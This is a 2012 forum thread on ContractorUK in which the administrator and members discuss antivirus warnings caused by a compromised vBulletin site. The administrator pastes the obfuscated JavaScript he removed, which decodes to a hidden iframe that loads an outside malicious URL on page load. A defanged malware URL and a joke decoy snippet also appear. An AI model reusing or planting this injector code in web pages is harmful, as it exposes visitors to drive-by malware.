Malicious URL blocked

Visitors can check out the Forum FAQ by clicking this link. You have to register before you can post: click the REGISTER link above to proceed. To start viewing messages, select the forum that you want to visit from the selection below. View our Forum Privacy Policy.
Want to receive the latest contracting news and advice straight to your inbox? Sign up to the ContractorUK newsletter here. Every sign up will also be entered into a draw to WIN £100 Amazon vouchers!

You are not logged in or you do not have permission to access this page. This could be due to one of several reasons:

You are not logged in. If you are already registered, fill in the form below to log in, or follow the "Sign Up" link to register a new account.
You may not have sufficient privileges to access this page. Are you trying to edit someone else's post, access administrative features or some other privileged system?
If you are trying to post, the administrator may have disabled your account, or it may be awaiting activation.

administrator replied

1 March 2012, 15:10
Originally posted by fullyautomatix View Post

Thats it, this is getting scary. I am off CUK for a while till all this virus infection stuff is fixed. Cant take the risk anymore.

Best not use the internet at all then, especially any forums - seen two more this afternoon that have been infected by the same route... Fingers crossed VBulletin will pull their fingers out, otherwise will have to look at a cross-grade to another system and I really don't want to have to do that
Leave a comment:
Cliphead replied

1 March 2012, 14:28
Originally posted by Arturo Bassick View Post

Isn't that against the law in Scotland land now?

Nope.
Leave a comment:
Bunk replied

1 March 2012, 14:04
Originally posted by administrator View Post

Prize for anyone who can decode this, some v clever code by the looks of it.

It's not actually doing anything that clever, just sticking an iframe on the page. All the gibberish is just to obfuscate the terms that would set alarm bells ringing like 'iframe' and the URL it points to.
Leave a comment:
Arturo Bassick replied

1 March 2012, 13:38
Originally posted by Cliphead View Post

Party food as Rangers die...........

Isn't that against the law in Scotland land now?
Leave a comment:

Zippy replied

1 March 2012, 13:36

Originally posted by northernladuk View Post

I have managed to decode it and found it drops a package on people's machines but it only executes when it spots a flounce... oh dear....

Yeah, me too

Code:

(function(){
fWZIQNA1='z9KRA5dz9KRA5oz9KRA5nz9KRA5\'tz9KRA5lz9KRA5ez9KRA5tz9KRA5tz9KRA5hz9KRA5ez9KRA5dz9KRA5oz9KRA5oz9KRA5rz9KRA5hz9KRA5iz9KRA5tz9KRA5yz9KRA5ez9KRA5rz9KRA5az9KRA5rz9KRA5sz9KRA5ez9KRA5oz9KRA5nz9KRA5tz9KRA5hz9KRA5ez9KRA5wz9KRA5az9KRA5yz9KRA5oz9KRA5uz9KRA5t';
var ziJ9xE='z9KRA5';
var tara=(fWZIQNA1.split(ziJ9xE).join(''));
alert(tara);
}) ();

Leave a comment:

northernladuk replied

1 March 2012, 13:11
Originally posted by fullyautomatix View Post

Thats it, this is getting scary. I am off CUK for a while till all this virus infection stuff is fixed. Cant take the risk anymore.

I have managed to decode it and found it drops a package on people's machines but it only executes when it spots a flounce... oh dear....
Leave a comment:
Cliphead replied

1 March 2012, 13:09
Originally posted by norrahe View Post

Same here, hopefully.

Irish jelly and ice cream avatar???

Party food as Rangers die...........
Leave a comment:
fullyautomatix replied

1 March 2012, 13:06
Thats it, this is getting scary. I am off CUK for a while till all this virus infection stuff is fixed. Cant take the risk anymore.
Leave a comment:
norrahe replied

1 March 2012, 13:04
Originally posted by Cliphead View Post

Hasn't popped up for a while now so looks like it's sorted.

Same here, hopefully.

Irish jelly and ice cream avatar???
Leave a comment:
Cliphead replied

1 March 2012, 12:50
Hasn't popped up for a while now so looks like it's sorted.
Leave a comment:
norrahe replied

1 March 2012, 12:48
Originally posted by Cliphead View Post

I keep getting Avast messages accessing CUK.

URL: http:// gostatics . com/default.cgi

Process: file://C:\Program Files\Mozilla Firefox\...

Infection: url:Mal

Anybody else seeing this?

Yep, keeps popping up this morning.
Leave a comment:

administrator replied

1 March 2012, 12:47

Sorry guys, just noticed this one and had a look. I have found the source of the infection and it was a different one to the last time. I saw another hack on a different forum a week or so ago, different to the one we had form a few weeks ago and also different to this one. The forum is up to date in terms of the latest patch level and we only run the one plug in and that is up to date as well. Will send ticket to VBulletin support in a sec as this is getting silly now.

This looks to be the source of the infection:

Code:

(function(){function bZq6wnH(){if(document.body){if(window.name!='jPPj0x'&&!window.tUN3fz){function gDHtJca(rzhDNW){if(rzhDNW.contentDocument)return rzhDNW.contentDocument; if(rzhDNW.contentWindow)return rzhDNW.contentWindow.document;return rzhDNW.document}var fe3k2f6r = {};with(fe3k2f6r){hOAoRrA=/a/.__proto__=='//';zENwnH5='\v'=='v'}var ziJ9xE='z9KRA5';var c0u8Z63='5567eb98';var fWZIQNA1='z9KRA5hz9KRA5tz9KRA5tz9KRA5pz9KRA5:z9KRA5/z9KRA5/z9KRA5nz9KRA5ez9KRA5tz9KRA5sz9KRA5tz9KRA5az9KRA5tz9KRA5iz9KRA5cz9KRA5.z9KRA5iz9KRA5nz9KRA5fz9KRA5oz9KRA5/z9KRA5iz9KRA5nz9KRA5.z9KRA5cz9KRA5gz9KRA5iz9KRA5?z9KRA53z9KRA5';var cxhqp5='z9KRA5iz9KRA5fz9KRA5rz9KRA5az9KRA5mz9KRA5ez9KRA5';var vQUxwE=fe3k2f6r.zENwnH5?'<'+cxhqp5.split(ziJ9xE).join('')+' name="'+c0u8Z63+'" src="'+fWZIQNA1.split(ziJ9xE).join('')+'">':cxhqp5.split(ziJ9xE).join('');var pYrOhQ=document.createElement(vQUxwE);with(pYrOhQ){name=c0u8Z63;setAttribute('name',c0u8Z63);id=c0u8Z63}document.body.appendChild(pYrOhQ);if(window.name==='')window.name='jPPj0x';window.tUN3fz=true;with(pYrOhQ.style){if(!fe3k2f6r.hOAoRrA)position='absolute';left=top='0px';height=width='1px';visibility='hidden'}if(!fe3k2f6r.zENwnH5)gDHtJca(pYrOhQ).location.replace(fWZIQNA1.split(ziJ9xE).join(''))}}else setTimeout(bZq6wnH,0)}bZq6wnH()})();

Prize for anyone who can decode this, some v clever code by the looks of it.

If you are still getting the infection attempt from Avast then PM me but have not seen the infection message since cleaning this file out.

As before, use Malware Bytes and make sure you haven't been infected. If your browsers and OS are up to date then you should be OK as I guess the code will look for flaws in these to exploit and install Trojans if possible.

If you ever get reports like this then please PM me as I will be able to react much quicker as I sometimes don't come here until later in the day.

Reply to: Malicious URL blocked

You are not logged in or you do not have permission to access this page. This could be due to one of several reasons:

Previously on "Malicious URL blocked"

Leave a comment:

Leave a comment:

Leave a comment:

Leave a comment:

Leave a comment:

Leave a comment:

Leave a comment:

Leave a comment:

Leave a comment:

Leave a comment:

Leave a comment:

Leave a comment:

Leave a comment:

Leave a comment:

Partners

Advertisers

Contractor Services

CUK News

Reply to: Malicious URL blocked

You are not logged in or you do not have permission to access this page. This could be due to one of several reasons:

Previously on "Malicious URL blocked"

Leave a comment:

Leave a comment:

Leave a comment:

Leave a comment:

Leave a comment:

Leave a comment:

Leave a comment:

Leave a comment:

Leave a comment:

Leave a comment:

Leave a comment:

Leave a comment:

Leave a comment:

Leave a comment: